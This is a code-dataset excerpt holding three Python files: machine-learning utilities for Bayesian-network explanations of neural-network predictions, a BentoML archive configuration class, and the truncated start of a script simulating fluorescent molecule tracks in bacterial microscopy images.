model_name + \"_hist.csv\", \"w\")\n w = csv.writer( file )\n \n for key, val in model_hist.history.items():\n w.writerow([key, val])\n \n file.close()\n print(path + model_name+\"_DUO.h5\")\n print(\"Model history saved to disk\") \n\n# LOAD_MODEL_HISTORY ------------------------------------------\n# loads a saved model history into memory\n# model_name: the name of the model\n# path: path to model history\ndef load_model_history( model_name, path):\n\n model_hist_loaded = {}\n values = []\n\n # load dictionary\n r = open( path + model_name + \"_hist.csv\", \"r\").read()\n for line in r.split(\"\\n\"):\n if(len(line) == 0):\n continue\n \n metric = line.split(\",\\\"[\")[0] # extract metrics\n values_str = line.split(\",\\\"[\")[1].replace(\"]\\\"\",\"\").split(\", \") # extract validation values\n values = [float(val_str) for val_str in values_str]\n model_hist_loaded.update( {metric : values} )\n \n return model_hist_loaded\n\n# LOAD_MODEL ------------------------------------------\n# loads a saved model into memory\n# model_name: the name of the model\n# path: path to model history \ndef load_model( model_name, path ):\n json_file = open( path + model_name + \"_DUO.json\", 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n\n # load weights into new model\n loaded_model = model_from_json(loaded_model_json)\n loaded_model.load_weights(path + model_name + \"_DUO.h5\")\n print(\"Loaded model from disk\")\n \n return loaded_model\n\ndef plot_model_history( model_history, metric ):\n\n plt.plot(model_history[ metric.lower() ], label='train')\n plt.plot(model_history[\"val_\" + metric.lower()], label='validation')\n plt.ylabel(metric)\n plt.xlabel('Number of Epochs')\n plt.ylim([0, 1])\n plt.legend()\n plt.show()\n\ndef plot_ROC_Curve( model, X, Y, n_classes):\n\n Y_pred_proba = model.predict(X)\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(Y[:, i], Y_pred_proba[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Plot of a ROC curve for a specific class\n for i in range(n_classes):\n plt.figure()\n plt.plot(fpr[i], tpr[i], label='ROC curve (area = %0.2f)' % roc_auc[i])\n plt.plot([0, 1], [0, 1], 'k--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic example')\n plt.legend(loc=\"lower right\")\n plt.show()\n\n# ENCODE_DATA --------------------------------------------------------------------------\n# Applies one hot encoder to data\n# data: a dataframe\n# class_var: string with class variable name\ndef encode_data(data, class_var):\n\n\tfeature_names = data.drop([class_var], axis=1).columns.tolist()\n\t\n\tX = data[ feature_names ].values\n\ty = data[class_var].values\n\n\tn_features = X.shape[1]\n\tn_classes = len(data[class_var].unique())\n\t\n\t# create numerical encoding for attribute species\n\tenc = OneHotEncoder()\n\tY = enc.fit_transform(y[:, np.newaxis]).toarray()\n\n\t# Scale data to have mean 0 and variance 1 \n\t# which is importance for convergence of the neural network\n\tscaler = MinMaxScaler()\n\tX_scaled = scaler.fit_transform(X)\n\t\n\treturn X_scaled, Y, enc, scaler\n\n# LOAD_TRAINING_DATA ---------------------------------------------------------------------\n# loads into a multiarray format a training set previously saved in a .csv file\n# dataset_path: string containing the path where the files will be saved\ndef load_training_data( dataset_path ):\n\tX_train = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Xtrain.csv\", index_col=False).values\n\tX_test = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Xtest.csv\", index_col=False).values\n\tX_validation =pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Xvalidation.csv\",index_col=False).values\n\tY_train = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Ytrain.csv\",index_col=False).values\n\tY_test =pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Ytest.csv\", index_col=False).values\n\tY_validation = pd.read_csv(dataset_path.replace(\".csv\", \"\") + \"_Yvalidation.csv\", index_col=False).values\n\t\n\treturn X_train, Y_train, X_test, Y_test, X_validation, Y_validation\n\n# GENERATE_SAVE_TRAINING_DATA ------------------------------------------------------------\n# \n# dataset_path: string containing the path where the files will be saved\n# X: NxM matrix representing the training data\n# Y: NxC matrix representing the OneHotEconder of C classes\ndef generate_save_training_data( dataset_path, X, Y):\n\t\"\"\"Generates training, test and validation sets and stores this information into files \n\t\n\tParameters\n\t----------\n\tdataset_path : str\n\t\tThe file location of the spreadsheet\n\tsamples : int, optional\n\t\tThe number of permutations to generate from the original vector (default is 300)\n\tvariance : int, optional\n\t\tQuantity to permute in each feature (default is 0.25)\n\t\t\n\tReturns\n\t-------\n\tpermutations : matrix\n\t\ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n\t\toriginal vector\n\t\"\"\"\n\t# generate train, test and validation sets\n\tX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=515)\n\tX_validation, X_test, Y_validation, Y_test = train_test_split(X_test, Y_test, test_size=0.5, random_state=515)\n\t\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Xtrain.csv\", X_train, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Xtest.csv\", X_test, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Xvalidation.csv\", X_validation, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Ytrain.csv\", Y_train, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Ytest.csv\", Y_test, delimiter=\",\")\n\tnp.savetxt(dataset_path.replace(\".csv\", \"\") + \"_Yvalidation.csv\", Y_validation, delimiter=\",\")\n\t\n \n\n##############################################################################\n#\t\t\t\t\t\tBAYESIAN NETWORK EXPLANATIONS\t\t\t\t\t\t #\n##############################################################################\n\n\ndef compute_perm_range(feat, variance = 0.25):\n \"\"\"\n \n Parameters\n ----------\n feat : float\n \tValue of a feature to be permuted\n samples : int, optional\n The number of permutations to generate from the original vector (default is 300)\n variance : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n min_range : float\n \tminimum value that a feature can be permuted\n max_range : float\n \tmaximum value that a feature can be permuted\n \"\"\"\n\n min_range = feat - variance\n max_range = feat + variance\n \n # features are scaled between 0 and 1\n # if the permutation make the feature negative, this values is set to 0\n if( min_range < 0 ):\n min_range = 0\n # if the permutation make the feature bigger than 1, this values is set to 1 \n if( max_range > 1 ):\n max_range = 1\n \n return min_range, max_range \n\n\n# PERMUTE_SINGLE_FEATURES_____________________________________________________________\n# \ndef permute_single_features( my_array, samples = 300, variance = 0.25 ):\n \"\"\"Given a single array from which one pretends to generate local explanations from\n Draw samples from a uniform distribution within a range of feature_val +- variance\n Returns a matrix with a number of samples (by default 300) with permutations \n of each feature of the input vector\n \n Parameters\n ----------\n my_array : np.array\n \tThe datapoint to be locally explained\n samples : int, optional\n The number of permutations to generate from the original vector (default is 300)\n variance : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n permutations : matrix\n \ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n \toriginal vector\n \"\"\"\n\n # permutation result list\n permutations = []\n # just keeping a controlled number of decimal places\n my_array = np.round(my_array,4)\n \n # keep a copy of the original array, since we will be changing the features\n my_array_backup = my_array.copy()\n \n # extract number of features\n num_features = my_array.shape[0]\n \n # add original vector to dataframe\n permutations.append( my_array_backup.tolist() )\n \n # for each feature of the input feature vector,\n for feat in range(0, num_features): \n \n \t# get feature value\n \tmy_array = my_array_backup.copy()\n \tfeature_val = my_array[feat]\n \t\n \t# set permutation of feature between [ feat - variance ; feat + variance ]\n \tmin_range, max_range = compute_perm_range( feature_val, variance )\n \t\n \t# generate sample of random features within a range\n \tfor perm in range(0, int(round(samples/num_features, 0))):\n \t\t# set the new vector\n \t\tmy_array[feat] = np.abs(np.round(rn.uniform(min_range, max_range),4))\n \t\tpermutations.append( my_array.tolist() )\n \t\t\n #rn.shuffle(permutations)\n return permutations\n\n\ndef check_input( value ):\n if value < 0:\n return 0\n if value > 1:\n return 1\n\n return value\n\ndef permute_single_features_circle( my_array, samples = 300, variance = 0.25 ):\n\n # permutation result list\n permutations = []\n # just keeping a controlled number of decimal places\n my_array = np.round(my_array,4)\n\n # keep a copy of the original array, since we will be changing the features\n my_array_backup = my_array\n\n # extract number of features\n num_features = my_array.shape[0]\n\n # add original vector to dataframe\n permutations.append( my_array_backup.tolist() )\n\n # for each feature of the input feature vector,\n for perm in range(0, int(round(samples/num_features, 0))):\n \n # generate sample of random features within a range\n \n temp1 = []\n temp2 = []\n for feat in range(0, num_features): \n theta = 2*math.pi*np.random.random()\n feature_val = my_array[feat]\n\n # set the new vector\n temp1.append( check_input( feature_val + np.round(np.random.uniform(0, variance),4)*math.cos(theta) ))\n temp2.append( check_input( feature_val + np.round(np.random.uniform(0, variance),4)*math.sin(theta) ))\n\n permutations.append( temp1 )\n permutations.append( temp2 )\n \n #rn.shuffle(permutations)\n return permutations[0:samples]\n\n\n\n# LEARNBN -------------------------------------------\n#\ndef learnBN( file_path, algorithm = \"Hill Climbing\" ):\n \"\"\"Given a single array from which one pretends to generate local explanations from\n Draw samples from a uniform distribution within a range of feature_val +- variance\n Returns a matrix with a number of samples (by default 300) with permutations \n of each feature of the input vector\n \n Parameters\n ----------\n my_array : np.array\n \tThe datapoint to be locally explained\n samples : int, optional\n The number of permutations to generate from the original vector (default is 300)\n variance : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n permutations : matrix\n \ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n \toriginal vector\n \"\"\"\n\n learner = gum.BNLearner( file_path )\n \n if( algorithm == \"Hill Climbing\"):\n print(\"Selecting Greedy Hill Climbing Algorithm\")\n learner.useGreedyHillClimbing()\n \n if( algorithm == \"Local Search\" ):\n print(\"Selecting Local Search Algorithm\")\n bn = learner.useLocalSearchWithTabuList()\n \n if( algorithm == \"3off2\"):\n print(\"Selecting 3Off2 Algorithm\")\n learner.use3off2()\n \n if( algorithm == \"miic\" ):\n print(\"Selecting MIIC Algorithm\")\n learner.useMIIC()\n \n learner.learnBN()\n \n bn = learner.learnBN()\n essencGraph = gum.EssentialGraph( bn )\n infoBN = gnb.getInformation( bn ) \n \n return [ bn, infoBN, essencGraph ]\n\n# DISCRETIZE_DATAFRAME -------------------------------------------------------\n#\n#\ndef discretize_dataframe( df, class_var, num_bins=4 ):\n \"\"\"Given a dataframe with continuous values, convert the continuous values into discrete ones\n by splitting the data into bins and by computing the respective quartiles\n \n Parameters\n ----------\n df : pd.DataFrame\n \tThe datapoint to be locally explained\n class_var : str\n The number of permutations to generate from the original vector (default is 300)\n num_bins : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n permutations : matrix\n \ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n \toriginal vector\n \"\"\" \n r=np.array(range(num_bins+1))/(1.0*num_bins)\n \n # quantiles are building using pandas.qcut\n # The \"class\" column is just copied.\n l=[]\n for col in df.columns.values:\n \n if col!=class_var:\n l.append( pd.DataFrame( pd.qcut( df[col],r, duplicates='drop',precision=2),columns=[col]))\n else:\n l.append( pd.DataFrame( df[col].values,columns=[col]))\n \n treated = pd.concat(l, join='outer', axis=1)\n return treated\n\n# SAVE_DISCRETIZED_DATAFRAME ---------------------------------------------------\n#\ndef save_discretized_dataframe(indx, df_model, model_type, perm_type, bins, dataset_name, path, class_var):\n \"\"\"Given a single array from which one pretends to generate local explanations from\n Draw samples from a uniform distribution within a range of feature_val +- variance\n Returns a matrix with a number of samples (by default 300) with permutations \n of each feature of the input vector\n \n Parameters\n ----------\n my_array : np.array\n \tThe datapoint to be locally explained\n samples : int, optional\n The number of permutations to generate from the original vector (default is 300)\n variance : int, optional\n \tQuantity to permute in each feature (default is 0.25)\n \t\n Returns\n -------\n permutations : matrix\n \ta 2-D matrix with dimensions (samples, features) with all the permutations of the \n \toriginal vector\n \"\"\" \n file_path = path + dataset_name + \"/\" + str(indx) + \"/\" + re.sub( r\"\\.\\w+\", \"\", dataset_name ) + \"_\" + model_type +\"_INDX_\" + str(indx) + \"_\" + perm_type +\".csv\"\n df_discr = discretize_dataframe( df_model, bins, class_var )\n \n print(\"Saving discretized dataset into: %s\\n\" %(file_path))\n df_discr.to_csv( file_path, index=False)\n\n\n# WRAP_INFORMATION -------------------------------------------\n#\ndef wrap_information( local_data_dict ):\n \n true_positives = []\n true_negatives = []\n false_positives = []\n false_negatives = []\n for instance in local_data_dict:\n \n # wrap up true positives\n if( instance['prediction_type'] == 'TRUE POSITIVE'):\n true_positives.append(instance)\n\n # wrap up true negatives\n if( instance['prediction_type'] == 'TRUE NEGATIVE' ):\n true_negatives.append(instance)\n \n # wrap up false positives\n if( instance['prediction_type'] == 'FALSE POSITIVE' ):\n false_positives.append(instance)\n \n # wrap up false negatives\n if( instance['prediction_type'] == 'FALSE NEGATIVE' ):\n false_negatives.append(instance)\n \n return true_positives, true_negatives, false_positives, false_negatives\n \n\n# GENERATE_PERMUTATIONS -------------------------------------------\n#\ndef generate_permutations( instance, labels_lst, feature_names, class_var, encoder, scaler, model, samples = 300, variance = 0.25):\n \n # get datapoint in scaled feature space\n local_datapoint = np.array(instance['scaled_vector'])\n # get datapoint in original feature space\n local_datapoint_orig = np.array(instance['original_vector'])\n \n # permute features\n permutations = permute_single_features( local_datapoint, samples = samples, variance = variance )\n #permutations = permute_single_features_circle( local_datapoint, samples = samples, variance = variance )\n \n # convert permutations to original feature space\n permutations_orig = scaler.inverse_transform( permutations )\n \n # compute predictions for each permuted instance\n predictions = encoder.inverse_transform( model.predict( permutations ) )\n \n # convert prediction classes to labels\n labelled_predictions = [ labels_lst[ int(predictions[indx][0]) ] for indx in range(0, len(predictions))]\n \n # add all this information to a single dataframe\n df_local_permutations = pd.DataFrame( permutations_orig, columns = feature_names )\n\n # add class variable to dataframe\n df_local_permutations[ class_var ] = labelled_predictions\n \n return df_local_permutations\n\n# GEBERATE_BN_EXPLANATIONS ------------------------------------------------------------\n#\ndef generate_BN_explanations(instance, label_lst, feature_names, class_var, encoder, scaler, model, path, dataset_name ):\n\n # necessary for starting Numpy generated random numbers in an initial state\n np.random.seed(515)\n\n # Necessary for starting core Python generated random numbers in a state\n rn.seed(515)\n\n indx = instance['index']\n prediction_type = instance['prediction_type'].lower()+\"s\"\n prediction_type = prediction_type.replace(\" \", \"_\")\n \n # generate permutations\n df = generate_permutations( instance, label_lst, feature_names, class_var, encoder, scaler, model)\n\n # discretize data\n df_discr = discretize_dataframe( df, class_var, num_bins=4 )\n\n # save discretised dataframe (for debugging and reproduceability purposes)\n path_to_permutations = path + \"feature_permutations/\" + dataset_name.replace(\".csv\",\"\") + \"/\" + prediction_type + \"/\" + str(indx) + \".csv\"\n df_discr.to_csv( path_to_permutations, index=False)\n\n # normalise dataframe\n normalise_dataframe( path_to_permutations )\n\n # learn BN\n bn, infoBN, essencGraph = learnBN( path_to_permutations.replace(\".csv\", \"_norm.csv\") )\n\n # perform inference\n inference = gnb.getInference(bn, evs={},targets=df_discr.columns.to_list(), size='12')\n\n # show networks\n gnb.sideBySide(*[bn, inference, infoBN ],\n captions=[ \"Bayesian Network\", \"Inference\", \"Information Network\" ])\n\n # save to file\n path_to_explanation = path + \"explanations/\" + dataset_name.replace(\".csv\", \"\") + \"/BN/\" + prediction_type + \"/\"\n gum.lib.bn2graph.dotize( bn , path_to_explanation + str(indx) + \"_BN\" )\n gum.saveBN(bn,path_to_explanation + str(indx) + \"_BN.net\" )\n\n return [bn, inference, infoBN]\n \n \n# GEBERATE_BN_EXPLANATIONSMB ------------------------------------------------------------\n#\ndef generate_BN_explanationsMB(instance, label_lst, feature_names, class_var, encoder, scaler, model, path, dataset_name, variance = 0.1, algorithm = \"Hill Climbing\" ):\n\n # necessary for starting Numpy generated random numbers in an initial state\n np.random.seed(515) \n\n # Necessary for starting core Python generated random numbers in a state\n rn.seed(515)\n\n indx = instance['index']\n prediction_type = instance['prediction_type'].lower()+\"s\"\n prediction_type = prediction_type.replace(\" \", \"_\")\n \n # generate permutations\n df = generate_permutations( instance, label_lst, feature_names, class_var, encoder, scaler, model, variance = variance)\n\n # discretize data\n df_discr = discretize_dataframe( df, class_var, num_bins=4 )\n\n # save discretised dataframe (for debugging and reproduceability purposes)\n path_to_permutations = path + \"feature_permutations/\" + dataset_name.replace(\".csv\",\"\") + \"/\" + prediction_type + \"/\" + str(indx) + \".csv\"\n df_discr.to_csv( path_to_permutations, index=False)\n\n # normalise dataframe\n normalise_dataframe( path_to_permutations )\n\n # learn BN\n bn, infoBN, essencGraph = learnBN( path_to_permutations.replace(\".csv\", \"_norm.csv\"), algorithm = algorithm)\n\n # perform inference\n inference = gnb.getInference(bn, evs={},targets=df_discr.columns.to_list(), size='12')\n \n # compute Markov Blanket\n markov_blanket = gum.MarkovBlanket(bn, class_var)\n \n # show networks\n # gnb.sideBySide(*[bn, inference, markov_blanket ],\n # captions=[ \"Bayesian Network\", \"Inference\", \"Markov Blanket\" ])\n\n # save to file\n path_to_explanation = path + \"explanations/\" + dataset_name.replace(\".csv\", \"\") + \"/BN/\" + prediction_type + \"/\"\n gum.lib.bn2graph.dotize( bn , path_to_explanation + str(indx) + \"_BN\" )\n gum.saveBN(bn,path_to_explanation + str(indx) + \"_BN.net\" )\n\n return [bn, inference, infoBN, markov_blanket]\n \n\n# GENERATE_LOCAL_PREDICTIONS -------------------------------------------\n#\ndef generate_local_predictions( X, Y, model, scaler, encoder ):\n \n # get original vector\n orig_vec = np.round(scaler.inverse_transform(X),6)\n\n # generate all predictions for X\n predictions = model.predict( X )\n\n # extrace the label of the prediction of X[indx]\n prediction_class = encoder.inverse_transform( predictions )\n local_data_dict = []\n for indx in range(0, orig_vec.shape[0]):\n\n ground_truth = np.expand_dims(Y[indx], axis=0)\n ground_truth_class = encoder.inverse_transform( ground_truth )[0][0]\n\n prediction = prediction_class[indx][0]\n\n # check if data point is a true positive\n if( ( int(prediction) == int(ground_truth_class) ) & (int(prediction)==1) & (int(ground_truth_class)==1) ):\n pred_type = \"TRUE POSITIVE\"\n\n # check if data point is a true negative\n if( ( int(prediction) == int(ground_truth_class) ) & (int(prediction)==0) & (int(ground_truth_class)==0) ):\n pred_type = \"TRUE NEGATIVE\"\n\n # check if data point is a false negative\n if( ( int(prediction) != int(ground_truth_class) ) & (int(prediction)==0) & (int(ground_truth_class)==1) ):\n pred_type = \"FALSE NEGATIVE\"\n\n # check if data point is a false positve\n if( ( int(prediction) != int(ground_truth_class) ) & (int(prediction)==1) & (int(ground_truth_class)==0) ):\n pred_type = \"FALSE POSITIVE\"\n\n local_data_dict.append( {'index' : indx,\n 'original_vector' : orig_vec[indx,:].tolist(),\n 'scaled_vector' : X[indx,:].tolist(),\n 'ground_truth' : ground_truth_class,\n 'predictions' : prediction,\n 'prediction_type' : pred_type})\n return local_data_dict\n \n##################################################################################\n# \t\t\t\t\tTEXT PROCESSING\t\t\t\t\t\t\t\t\t\t\t\t #\n# ###############################################################################\n\n\n# FIND -----------------------------------------------\n# \ndef find(s, ch):\n return [i for i, ltr in enumerate(s) if ltr == ch]\n\n# UNTOKENIZE -----------------------------------------------\n#\ndef untokenize( tokens, delim ):\n \n untokenized = tokens[0]\n \n for indx in range(1, len(tokens)):\n untokenized = untokenized + delim + tokens[indx]\n \n return untokenized\n\n# NORMALISE_LINE -------------------------------------------\n#\ndef normalise_line( my_str, class_label ):\n \n my_str = my_str.replace(\"\\\",\"+class_label, \"\")\n my_str = my_str.replace(\"-1e-05\", \"0.0000\")\n \n tokens = my_str.split(\"\\\",\\\"\")\n tokens_norm = []\n\n for token in tokens:\n\n token = token.replace(\"]\",\"\")\n\n indxs = find(token, \".\")\n indx_comma = find(token, \",\")[0]+2\n\n if( (len(token[indxs[1]+1 : -1 ]) >= 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) >= 4) ):\n token_temp = token[0:indxs[0]] + \".\" + token[indxs[0] + 1 : indxs[0]+5] + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : indxs[1]+5 ] + \"]\"\n \n if( (len(token[indxs[1]+1 : -1 ]) < 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) >= 4) ):\n extra = \"0\"*(np.abs(len(token[indxs[1]+1 : -1 ]) - 4))\n token_temp = token[0:indxs[0]] + \".\" + token[indxs[0] + 1 : indxs[0]+5] + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : -1 ] + extra + \"]\"\n \n if( (len(token[indxs[1]+1 : -1 ]) >= 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) < 4) ):\n extra = \"0\"*(np.abs(len( token[indxs[0]+1 : indx_comma-2 ]) - 4))\n token_temp = token[0:indxs[0]] + \".\" + extra + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : -1 ] + extra + \"]\"\n \n if( (len(token[indxs[1]+1 : -1 ]) < 4) & (len( token[indxs[0]+1 : indx_comma-2 ]) < 4) ):\n extra2 = \"0\"*(np.abs(len(token[indxs[1]+1 : -1 ]) - 4))\n extra1 = \"0\"*(np.abs(len(token[indxs[0]+1 : -1 ]) - 4))\n token_temp = token[0:indxs[0]] + \".\" + extra1 + \", \" +token[indx_comma:indxs[1]] + token[indxs[1] : -1 ] + extra2 + \"]\"\n \n tokens_norm.append(token_temp)\n\n return untokenize( tokens_norm, \"\\\",\\\"\") + \"\\\",\" +class_label\n\n# NORMALISE_LINE -------------------------------------------\n#\ndef normalise_dataframe( path_to_permutations ):\n file = open(path_to_permutations,\"r\")\n\n f_write = open(path_to_permutations.replace(\".csv\", \"_norm.csv\"),\"w\")\n\n header = file.readline().replace(\"\\n\",\"\")\n f_write.write( header + \"\\n\")\n \n for line in file.readlines():\n \n # get class\n class_label = line.split(\"\\\",\")[-1].replace(\"\\n\",\"\")\n # normalise dataframe input\n line_norm = normalise_line( line.replace(\"\\n\",\"\"), class_label )\n # write normalised input to file\n f_write.write(line_norm + \"\\n\")\n \n file.close()\n f_write.close()\n \n\n\n \n\n\n","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":35787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"568306587","text":"# Copyright 2019 Atalaya Tech, Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport logging\nfrom datetime import datetime\n\nfrom ruamel.yaml import YAML\n\nfrom bentoml import __version__ as BENTOML_VERSION\nfrom bentoml.configuration import get_bentoml_deploy_version\nfrom bentoml.utils import Path\n\nBENTOML_CONFIG_YAML_TEPMLATE = \"\"\"\\\nversion: {bentoml_version}\nkind: {kind}\nmetadata:\n created_at: {created_at}\n\"\"\"\n\nLOG = logging.getLogger(__name__)\n\n\nclass BentoArchiveConfig(object):\n def __init__(self, kind=\"BentoService\"):\n self.kind = kind\n self._yaml = YAML()\n self._yaml.default_flow_style = False\n self.config = self._yaml.load(\n BENTOML_CONFIG_YAML_TEPMLATE.format(\n kind=self.kind,\n bentoml_version=get_bentoml_deploy_version(),\n created_at=str(datetime.utcnow()),\n )\n )\n\n def write_to_path(self, path, filename=\"bentoml.yml\"):\n return self._yaml.dump(self.config, Path(os.path.join(path, filename)))\n\n @classmethod\n def load(cls, filepath):\n conf = cls()\n with open(filepath, \"rb\") as config_file:\n yml_content = config_file.read()\n conf.config = conf._yaml.load(yml_content)\n\n if conf[\"version\"] != BENTOML_VERSION:\n msg = (\n \"BentoArchive version mismatch: loading archive bundled in version \"\n \"{}, but loading from version {}\".format(\n conf[\"version\"], BENTOML_VERSION\n )\n )\n\n # If major version is different, then there could be incompatible API\n # changes. Raise error in this case.\n if conf[\"version\"].split(\".\")[0] != BENTOML_VERSION.split(\".\")[0]:\n if not BENTOML_VERSION.startswith('0+untagged'):\n raise ValueError(msg)\n else:\n LOG.warning(msg)\n else: # Otherwise just show a warning.\n LOG.warning(msg)\n\n return conf\n\n def __getitem__(self, item):\n return self.config[item]\n\n def __setitem__(self, key, value):\n self.config[key] = value\n\n def __contains__(self, item):\n return item in self.config\n","sub_path":"bentoml/archive/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"194198173","text":"import cv2\nimport numpy as npy\nimport random as rnd\nfrom scipy import ndimage\nimport math as mt\nfrom skimage.external import tifffile\nfrom scipy.stats import expon\nimport pandas as pd\nimport scipy.io as sio\n#UNITs of time are in milliseconds\nfilename = 'Ecoli_Training_FAST_0.100_test.tif'\npixels = 500\nresolution = 10 #tens of nanometers\nsize_image = pixels*resolution # size of image in 10 nm resolution. Memory issues arise for better resolution\nimages = []\nimage = npy.zeros((size_image, size_image, 3), npy.uint16) # Create and RGB image\ninterval_frame = 1 # Time interval (frames)\ncamera_exposure = 100\ndt = 5#ms\nint_steps = npy.int_(camera_exposure/dt)\nnum_images = 80\n\ntrack_steps = int_steps*num_images*interval_frame\n#setting the number of time steps based on exposure, time interval, number of images\n\nprint(track_steps)\n\nintegrate_array = npy.arange(int_steps - 1,track_steps, int_steps*interval_frame)\nintegrate_array_2 = npy.arange(int_steps - 1,track_steps, int_steps*interval_frame)\nintegrate_array_2[0] = 0\nintegrate_array_2[1:] = integrate_array_2[1:] - int_steps + 1\nprint(integrate_array_2)\n#integrate_array = npy.arange(int_steps - 1,track_steps, int_steps*interval_frame)\nprint(integrate_array)\n#Array that tells when to snap an image\ntrack_numbers = 2\n#number of tracks per bacterium\nnum_bacteria = 350\n#number of bacteria\n\nint_fluorophore = 3000\n#Intensity within exposure time\nU1_single_spot = int_fluorophore/int_steps\n#Intensity per single time step\n\nout_background = 150\n#Camera noise\nout_back_sigma = 20\n#standard deviation of camera noise\nCell_bg_intensity = 5\n#Cell autofluorescence within exposure time. Note: it is not being integrated.\ncell_background = 0.2#Cell_bg_intensity/int_steps\n#print('cell background', cell_background, npy.random.poisson(cell_background, 1))\n#cell_background_sigma = 0.05\nmean_psf = 13\n#Point spread function. I.e how much the intensity of the spot will be spread out based on convultion with gaussian filter\nstd_psf = 1.0 #don't use\n\nwid_bac_mean = 70\n#mean width of bacterium\nstd_wid = 10\n\nlength_bac_mean = 300\n#mean length of bacterium\nstd_length = 50\n\nTbleach = 2000 # Bleach time (ms). Will need to vary this based on time interval\nkbleach = 1/Tbleach\nTunbind = 100000 #Bound time\nTbind = 100000 # Time to bind (i.e. search time)\nkunbind = 1/Tunbind\nkbind = 1/Tbind\nalpha_co = 0.4 # for chromosome bound fraction\n\nD1 = 5# Diffusion coefficient of fast moving population\nvar_1 = 2*D1*dt\n\nD2 = 0.05 # Diffusion coefficient of slow moving population in 10nm^2/mss\nvar_2 = 2*D2*dt**alpha_co\n\n#Weights of Diffusion coefficients\nw1 = 0.3\nw2 = 1-w1\nparams_array = [interval_frame, camera_exposure,cell_background, Tbleach,Tunbind,Tbind,D1,D2, int_fluorophore, w1]\nparams_array_num = npy.array(params_array)\ndat_df = pd.DataFrame(params_array_num)\ndat_df_Tr = dat_df.T\ncolumns_nam = ['Interval(frames)', 'Camera Exposure', 'Cell Background (per resolution)', 'Tbleach', 'Bound Time', 'Search Time', 'Fast Moving D', 'Bound D', 'IntFluorophore', 'Weight D1']\ndat_df_Tr.columns = columns_nam\n\n\n\n#df_params = pd.DataFrame(dat_df_Tr)#pd.DataFrame(dat_df_Tr, columns = columns_nam)\n\nfile_nam_params = filename.replace(\".tif\", \"_params.csv\")\ndat_df_Tr.to_csv(file_nam_params)\n#Array for positions of bacteria\nbac_cells = npy.zeros((num_bacteria, 6))\n\n#Borders of image\npositions_lower_bnd = 0\npositions_upper_bnd = 5000\n#Array for initial positions of tracks\ntrack_initials = npy.zeros((track_numbers, 3, num_bacteria))\n#Array for tracks\ntrack = npy.zeros((track_steps, 3, track_numbers, num_bacteria))\n#Array for state\ntrack_D = npy.zeros((track_numbers, 1, num_bacteria))\n\ntracks_save = npy.zeros((num_images,2, track_numbers,num_bacteria))\ntracks_save_D = npy.zeros((num_images,1, track_numbers,num_bacteria))\n#States for Diffusive State\nD1_st = 0\nD2_st = 1\n#States of fluorescence\nFL_st = 2\nBl_st = 3\n#Probabilities for diffusive state changes\nD1_F_p = expon.cdf(x=dt, scale=Tbind)\nD2_F_p = expon.cdf(x=dt, scale=Tunbind)\n#Bleach probability\nB_p = expon.cdf(x=dt, scale=Tbleach)\n#Probabilities for no transition\nD1_D1_p = 1 - D1_F_p\nD2_D2_p = 1 - D2_F_p\nB_p_N = 1 - B_p\n\n\nTrans_mat_D = npy.array([[D1_D1_p, D1_F_p], [D2_F_p, D2_D2_p]])\nTrans_mat_F = npy.array([B_p_N, B_p])\n\nweights = [w1, w2]\nD = [D1_st, D2_st]\n\nyrang_coord = npy.arange(positions_lower_bnd + (length_bac_mean + 3.5*std_length), positions_upper_bnd - (length_bac_mean + 3.5*std_length), (length_bac_mean + 3.5*std_length))\nxrang_coord = npy.arange(positions_lower_bnd + (wid_bac_mean + 3.5*std_wid), positions_upper_bnd - (wid_bac_mean + 3.5*std_wid), (wid_bac_mean + 3.5*std_wid))\n\n[xv, yv] = npy.meshgrid(xrang_coord, yrang_coord)\nnum_cols = npy.shape(xv)\nprint(num_cols)\ncoord_bac_x = 